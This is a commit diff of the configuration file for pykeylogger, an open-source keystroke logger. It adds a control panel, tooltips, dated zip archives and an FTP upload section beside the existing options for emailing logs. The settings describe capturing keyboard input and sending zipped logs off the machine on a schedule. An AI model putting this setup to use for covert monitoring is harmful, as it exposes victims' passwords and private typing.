in the process of adding control panel and reconfiguring some features: -make zipping files function stand on its own, and make dated zipfiles -add the beginning of a gui control panel -add tooltips for the control panel -reconfigure ini file to have tooltips, add ftp section (not yet implemented) -make exitkey call up the control panel -add support request message (currently set to show when running from source, for testing purposes) -some reconfiguration to add all this stuff, and probably some more minor details i am forgetting to mention...

--- a/pykeylogger.ini
+++ b/pykeylogger.ini
@@ -1,118 +1,206 @@
 [general]
 
+# Set to the master password to control pykeylogger
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
+# default: None
+masterPasswordTooltip=Set to the master password to control pykeylogger
+masterPassword=None
+
 # Set dirname to the full path of directory where you want logs to be written.
 # default: C:\Temp\logdir
+dirNameTooltip=Set to the full path of directory where you want logs to be written.
 dirName=C:\Temp\logdir
 
 # Log keyboard input
 # default: True
+hookKeyboardTooltip=Log keyboard input
 hookKeyboard=True
 
 # Add linefeed [\\n] character when carriage return [\\r] character is detected (for Notepad compatibility)
 # default: False
+addLineFeedTooltip=Add linefeed [\n] character when carriage return [\r] character is detected (for Notepad compatibility)
 addLineFeed=False
 
 # Translate backspace chacarter into printable string
 # default: False
+parseBackspaceTooltip=Translate backspace chacarter into printable string (for Notepad compatibility)
 parseBackspace=False
 
 # Translate escape chacarter into printable string
 # default: False
+parseEscapeTooltip=Translate escape chacarter into printable string (for Notepad compatibility)
 parseEscape=False
 
 # Specify the key to press to exit keylogger (hint: to disable key, just set to a nonexistent key)
 # default: F12
-exitKey=F12
+controlKeyTooltip=Specify the key to press to bring up control panel (hint: to disable key, just set to a nonexistent key)
+controlKey=F12
 
+##### disabled
 # Specify the key to press to flush write buffer to file (hint: to disable key, just set to a nonexistent key. buffer will still be flushed automatically.)
 # default: F11
-flushKey=F11
+#flushKeyTooltip=Specify the key to press to flush write buffer to file (hint: to disable key, just set to a nonexistent key. buffer will still be flushed automatically.)
+#flushKey=F11
 
 # Specify one or more applications by full path name whose input will not be logged. separate multiple applications with semicolon ";".
 # Leave as "None" to log all applications.
 # default: None
+noLogTooltip=Specify one or more applications by full path name whose input will not be logged. separate multiple applications with semicolon ";". Leave as "None" to log all applications.
 noLog=None
 
 # Log all output to one file (filename specified here), inside directory specified with dirName, rather than to multiple files.
 # Leave as "None" to let logging take place to multiple files
 # default: None
+oneFileTooltip=Log all output to one file (filename specified here), inside directory specified with dirName, rather than to multiple files. Leave as "None" to let logging take place to multiple files.
 oneFile=None
 
 # Specify the time interval between buffer autoflush events, in seconds. 
 # default: 120
+flushIntervalTooltip=Specify the time interval between buffer autoflush events, in SECONDS.
 flushInterval=120
 
 # Log some debug/informational output, to a systemlog file (filename specified here), inside directory specified with dirName
 # Set to None to disable
 # default: None
+systemLogTooltip=Log some debug/informational output, to a systemlog file (filename specified here), inside directory specified with dirName. Set to "None" to disable.
 systemLog=None
 
 [email]
 
 # Set to True to enable automatic periodic emails of a zipped archive of logfiles
 # default: False
+smtpSendEmailTooltip=Set to True to enable automatic periodic emails of a zipped archive of logfiles.
 smtpSendEmail=False
 
 # Set to True if your smtp server requires a login with username/password
 # default: True
+smtpNeedsLoginTooltip=Set to True if your smtp server requires a login with username/password.
 smtpNeedsLogin=True
 
 # Set to your username (only needed if your smtp server requires a login)
+# For security purposes, this value can only be set through the control panel, to avoid storing your username in plain text.
 # default: yourusername
+smtpUsernameTooltip=Set to your username for the smtp server (only needed if your smtp server requires a login).
 smtpUsername=yourusername
 
 # Set to your password (only needed if your smtp server requires a password)
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
 # default: yourpassword
+smtpPasswordTooltip=Set to your password (only needed if your smtp server requires a password).
 smtpPassword=yourpassword
 
 # Set to the hostname of your smtp server
 # default: your.smtp.server
+smtpServerTooltip=Set to the hostname of your smtp server.
 smtpServer=your.smtp.server
 
 # Set to the email address that you want to appear in the "From" line in your email
 # default: yourfromaddress@host.com
+smtpFromTooltip=Set to the email address that you want to appear in the "From" line in your email.
 smtpFrom=yourfromaddress@host.com
 
 # Set to the email address that you want to appear in the "To" line in your email. Separate multiple addresses semicolon ";".
 # default: yourtoaddress@host.com
+smtpToTooltip=Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
 smtpTo=yourtoaddress@host.com
 
 # Set to the text you want to appear in the Subject line in your email
 # default: Automatic Logfile Email
+smtpSubjectTooltip=Set to the text you want to appear in the Subject line in your email.
 smtpSubject=Automatic Logfile Email
 
 # Set to the text that you want to appear in the message body of your email
 # default: Please see attached zipfile.
+smtpMessageBodyTooltip=Set to the text that you want to appear in the message body of your email.
 smtpMessageBody=Please see attached zipfile.
 
 # Specify the time interval between automatic log email events, in hours. 
 # default: 4.0
+emailIntervalTooltip=Specify the time interval between automatic log email events, in HOURS.
 emailInterval=4.0
 
+[zip]
+
+##### disabled. filename set to log_[date].zip
 # Specify the filename for the zip archive that will be emailed to you
 # default: logzip.zip
-zipArchiveName=logzip.zip
+#zipArchiveNameTooltip=Specify the filename for the zip archive that will be emailed to you. "[date]" will be replaced with current date/time in MMDDYYYY_HHMMSS format. If "[date]" is not present, it will be added at the end of the filename, as it is needed for proper operation.
+#zipArchiveName=log_[date].zip
+
+zipEnableTooltip=Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
+zipEnable=False
+
+zipIntervalTooltip=Set this to the time interval between automatic zip events, in HOURS. 
+zipInterval=4.0
+
+
+[ftp]
+
+# Set to True to enable automatic periodic uploading of a zipped archive of logfiles by FTP
+# default: False
+ftpUploadFilesTooltip=Set to True to enable automatic periodic uploading of a zipped archive of logfiles by FTP.
+ftpUploadFiles=False
+
+# Set to the hostname of your ftp server
+# default: your.ftp.server
+ftpServerTooltip=Set to the hostname of your ftp server.
+ftpServer=your.ftp.server
+
+# Set to the port number of your ftp server (most ftp servers run on port 21)
+# default: 21
+ftpPortTooltip=Set to the port number of your ftp server (most ftp servers run on port 21).
+ftpPort=21
+
+# Set to the directory on the server where you would like to upload
+# default: pykeylogger
+ftpUploadDirTooltip=Set to the directory on the server where you would like to upload (relative or full path accepted).
+ftpUploadDir=pykeylogger
+
+# Set to your username
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
+# default: anonymous
+ftpUserNameTooltip=Set to your username on the target FTP server. 
+ftpUserName=anonymous
+
+# Set to your password
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
+# default: anonymous@
+ftpPasswordTooltip=Set to your password on the target FTP server.
+ftpPassword=anonymous@
+
+# Set to True to enable passive mode file transfer
+# default: True
+ftpPassiveTooltip=Set to True to enable passive mode file transfer (recommended).
+ftpPassive=True
+
+ftpIntervalTooltip=Set this to the time interval between automatic FTP events, in HOURS.
+ftpInterval=4.0
 
 [logmaintenance]
 
 # Set to True to enable automatic deletion of old logs
 # default: False
+deleteOldLogsTooltip=Set to True to enable automatic deletion of old logs.
 deleteOldLogs=False
 
 # Set to the maximum age of the logs that you want to keep, in days. Logs older than this will be deleted.
 # default: 2.0
+maxLogAgeTooltip=Set to the maximum age of the logs that you want to keep, in days. Logs older than this will be deleted.
 maxLogAge=2.0
 
 # Set to the frequency of checking for and deleting logs older than maxLogAge, in hours. 
 # default: 2.0
+ageCheckIntervalTooltip=Set to the frequency of checking for and deleting logs older than maxLogAge, in HOURS.
 ageCheckInterval=2.0
 
 [timestamp]
 
 # Set this to True to enable periodic timestamps in the logfiles
 # default: True
+timestampEnableTooltip=Set this to True to enable periodic timestamps in the logfiles.
 timestampEnable=True
 
 # Set this to time interval (in minutes) between the timestamps
 # default: 30.0
+timestampIntervalTooltip=Set this to time interval between the timestamps, in MINUTES.
 timestampInterval=30.0
